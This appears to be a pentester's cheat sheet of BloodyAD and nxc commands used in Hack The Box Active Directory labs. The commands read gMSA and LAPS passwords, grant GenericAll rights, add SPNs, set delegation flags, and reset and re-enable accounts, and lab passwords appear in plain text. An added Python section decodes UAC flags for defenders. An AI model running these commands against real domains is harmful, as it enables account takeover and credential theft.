# BloodyAD

## GMSA

{% code overflow="wrap" %}

```bash
bloodyAD -d rebound.htb -u tbrady -p 543BOMBOMBUNmanda --host dc01.rebound.htb get object 'delegator$' --attr msDS-ManagedPassword
```

{% endcode %}

## LAPS

{% code overflow="wrap" %}

```bash
bloodyAD -u <user> -d <domain> -p <pass> --host <ip> get object 'COMPUTER$' --attr ms-Mcs-AdmPwd
```

{% endcode %}

## LDAP Attributes

{% code overflow="wrap" %}

```bash
bloodyad -d puppy.htb -u levi.james -p KingofAkron2025! -i 10.129.232.75 get object ant.edwards
```

{% endcode %}

## Rights Assignment

{% code overflow="wrap" %}

```bash
# give oorend user GenericAll rights over the Service Users OU
bloodyAD -d rebound.htb -u oorend -p '1GR8t@$$4u' --host dc01.rebound.htb add genericAll 'OU=SERVICE USERS,DC=REBOUND,DC=HTB' oorend
```

{% endcode %}

## SPN

{% code overflow="wrap" %}

```bash
# Add an SPN
bloodyad -d mollysec.local --host dc.mollysec.local -u molly -p 'Pass123!' set object bob servicePrincipalName -v 'HTTP/DoesNotMatter'
```

{% endcode %}

## UAC Values

The flags along with their corresponding values can be found [here](https://learn.microsoft.com/en-us/troubleshoot/windows-server/active-directory/useraccountcontrol-manipulate-account-properties#list-of-property-flags). However, instead of calculating the values manually, we can use a tool like [uacdecoder](https://uacdecoder.com/uac_decoder_tool.html#article12-9) to do it for us.

### Delegations

#### Constrained

{% code overflow="wrap" %}

```bash
# Set constrained delegation from a Linux host (userAccountControl = TRUSTED_TO_AUTH_FOR_DELEGATION + WORKSTATION_TRUST_ACCOUNT)
bloodyad -u molly -p Pass123 -d mollysec.local -i 10.10.10.5 set object 'badPc$' userAccountControl -v 16781312 --raw

# Set the service the account is allowed to delegate to (msDS-AllowedToDelegateTo)
bloodyad -u molly -p Pass123 -d mollysec.local -i 10.10.10.5 set object 'badPc$' msDS-AllowedToDelegateTo -v 'ldap/dc01.mollysec.local'
```

{% endcode %}

#### Unconstrained

{% code overflow="wrap" %}

```bash
# Set unconstrained delegation from a Linux host (userAccountControl = TRUSTED_FOR_DELEGATION + WORKSTATION_TRUST_ACCOUNT)
bloodyad -u molly -p Pass123 -d mollysec.local -i 10.10.10.5 set object 'badPc$' userAccountControl -v 528384 --raw
```

{% endcode %}

### Enable User

In the foothold section of [Puppy](https://www.hackthebox.com/machines/puppy), after compromising `ant.edwards`, we notice that it has `GenericAll` over `adam.silver`, so we can use that right to change its password:

{% code overflow="wrap" %}

```bash
# Change the target's password
$ nxc smb dc -u ant.edwards -p $(cat ant-password) -M change-password -o USER=adam.silver NEWPASS=Pass123

# Validate credentials
$ nxc smb dc -u adam.silver -p Pass123
...
SMB    10.129.232.75    445    DC    [-] PUPPY.HTB\adam.silver:Pass123 STATUS_ACCOUNT_DISABLED
```

{% endcode %}

It seems that the account is disabled, which we can confirm via BloodHound:

<figure><img src="/files/7m3iVtUFUnAEMkksTH7q" alt=""><figcaption></figcaption></figure>

We can decode its UAC value using [uacdecoder](https://uacdecoder.com/uac_decoder_tool.html#article12-9):

<figure><img src="/files/M2GqtsZpIEnIUXrncMR6" alt=""><figcaption></figcaption></figure>

To enable the account, all we have to do is subtract `2` (the `ACCOUNTDISABLE` flag) from the current `userAccountControl` value:

{% code overflow="wrap" %}

```bash
# Set the new UAC value
$ bloodyAD --host 10.129.232.75 -d puppy.htb -u ant.edwards -p $(cat ant-password) set object adam.silver userAccountControl -v 66048
```

{% endcode %}
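Rather than decoding `userAccountControl` by hand or with uacdecoder, the flag arithmetic used in the UAC Values and Enable User sections above can be done with a few lines of Python. This is an added example, not part of the original page or of BloodyAD; the flag constants are the ones from the Microsoft list linked above, and it assumes the disabled account's pre-change value was 66050 (as implied by subtracting 2 to get 66048). The `delegation_change` helper goes slightly beyond the page: it reports which delegation flags an old-to-new UAC change turned on, which is what a defender wants to pull out of a 4738/4742 "account changed" event.

```python
# Added example, not part of the original page: decode and edit
# userAccountControl bit flags (values from the Microsoft flag list
# linked above) and check the numbers used on this page.

UAC_FLAGS = {
    "SCRIPT": 0x00000001,
    "ACCOUNTDISABLE": 0x00000002,
    "HOMEDIR_REQUIRED": 0x00000008,
    "LOCKOUT": 0x00000010,
    "PASSWD_NOTREQD": 0x00000020,
    "PASSWD_CANT_CHANGE": 0x00000040,
    "ENCRYPTED_TEXT_PWD_ALLOWED": 0x00000080,
    "TEMP_DUPLICATE_ACCOUNT": 0x00000100,
    "NORMAL_ACCOUNT": 0x00000200,
    "INTERDOMAIN_TRUST_ACCOUNT": 0x00000800,
    "WORKSTATION_TRUST_ACCOUNT": 0x00001000,
    "SERVER_TRUST_ACCOUNT": 0x00002000,
    "DONT_EXPIRE_PASSWORD": 0x00010000,
    "MNS_LOGON_ACCOUNT": 0x00020000,
    "SMARTCARD_REQUIRED": 0x00040000,
    "TRUSTED_FOR_DELEGATION": 0x00080000,
    "NOT_DELEGATED": 0x00100000,
    "USE_DES_KEY_ONLY": 0x00200000,
    "DONT_REQ_PREAUTH": 0x00400000,
    "PASSWORD_EXPIRED": 0x00800000,
    "TRUSTED_TO_AUTH_FOR_DELEGATION": 0x01000000,
    "PARTIAL_SECRETS_ACCOUNT": 0x04000000,
}
# Delegation flags worth alerting on in a 4738/4742 account-changed event.
DELEGATION_FLAGS = ("TRUSTED_FOR_DELEGATION", "TRUSTED_TO_AUTH_FOR_DELEGATION")

def decode_uac(value: int) -> list[str]:
    """Names of the flags set in value, lowest bit first; unknown bits reported as hex."""
    names = [name for name, bit in UAC_FLAGS.items() if value & bit]
    unknown = value & ~sum(UAC_FLAGS.values())
    if unknown:
        names.append(f"UNKNOWN_0x{unknown:08x}")
    return names

def clear_flag(value: int, flag: str) -> int:
    """Return value with one flag removed (a bitwise clear, so it is safe even if the flag was not set)."""
    return value & ~UAC_FLAGS[flag]

def set_flag(value: int, flag: str) -> int:
    return value | UAC_FLAGS[flag]

def delegation_change(old: int, new: int) -> list[str]:
    """Delegation flags that an old -> new userAccountControl change turned on."""
    return [f for f in DELEGATION_FLAGS if not old & UAC_FLAGS[f] and new & UAC_FLAGS[f]]
```

`clear_flag` is the bit-safe form of the "subtract 2" step: subtraction corrupts the value if the flag is already clear, a bitwise clear does not.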

## get

### writable

{% code overflow="wrap" %}

```bash
bloodyad --host 10.1.168.133 -d mollysec.local -u 'molly' -p 'Pass123' get writable
```

{% endcode %}
